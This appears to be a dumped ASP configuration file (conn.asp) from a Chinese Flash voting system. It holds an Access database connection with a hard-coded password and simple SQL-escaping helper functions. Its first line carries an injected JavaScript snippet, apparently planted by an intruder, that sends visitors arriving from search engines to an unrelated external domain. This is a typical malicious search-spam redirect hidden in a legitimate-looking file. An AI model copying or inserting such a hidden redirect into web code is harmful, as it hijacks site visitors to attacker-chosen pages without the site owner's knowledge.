d:\wwwroot\wuchunhua\toupiao\conn.asp

d:\wwwroot\wuchunhua\toupiao\conn.asp

001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><%
002: '=====================================================================================
003: 'flash饼图投票系统多用户版1.0
004: 'flashballot1.0
005: '作者:毛虫
006: '网地:www.flashado.com
007: 'email:mc@flashado.com
008: '如有BUG请尽快向我提出，这样我会尽快更新
009: '=====================================================================================
010: '-------------------------------------------------------------------------------------
011: '参数设置个别参数请到下面下载=============================================================
012: filtrate=true'是否防止重复投票,当为true是启用防止重复投票
013: myday=1'设置重复投票的天数
014: mydata="ballot.mdb"'数据库路经
015: '=======================================================
016: dim conn
017:    dim rs
018:    rs="DBQ="+server.mappath(mydata)+";DefaultDir=;DRIVER={Microsoft Access Driver (*.mdb)};Pwd=netroom;"
019:      set conn=server.createobject("ADODB.CONNECTION")
020:      conn.open rs
021:
022: '目的：SQL注入攻击预防装置[字符型]
023:
024: function strtext(str)
025:     strtext=replace(str,chr(34),""")
026: end function
027:
028: function strSql(str)
029:     strSql=replace(str,"'","''")
030: end function
031:
032: function flashSql(str)
033:     flashSql=replace(str,"chr(124)","|")
034: end function
035:
036: '目的：SQL注入攻击预防装置[数字型]
037: function intSql(Numeric)
038:     if IsNumeric(Numeric) then
039:         intSql=Numeric
040:     else
041:         intSql=0
042:     end if
043: end function
044:
045: function inthit(Numeric)
046:    If(Numeric="") Then
047:       inthit=1
048:    else
049:        if IsNumeric(Numeric) and Numeric>=1 then
050:       inthit=Numeric
051:        else
052:       inthit=1
053:        end if
054:    End if
055: end function
056:
057: Function validpersonal(username,password)
058: sql="select * from admin where name='"& strSql(username) &"' and pass ='"& strSql(password) &"'"
059:    set rs=server.createobject("adodb.recordset")
060:       rs.open sql,conn,3,2
061:    If(rs.eof) Then
062:       validpersonal=false
063:    else
064:       validpersonal=true
065:    End if
066: End Function
067:
068: '判断发言是否来自外部
069: function ChkPost()
070:    dim server_v1,server_v2
071:    chkpost=false
072:    server_v1=Cstr(Request.ServerVariables("HTTP_REFERER"))
073:    server_v2=Cstr(Request.ServerVariables("SERVER_NAME"))
074:    if mid(server_v1,8,len(server_v2))<>server_v2 then
075:       chkpost=false
076:    else
077:       chkpost=true
078:    end if
079: end function
080: %>
081:
082: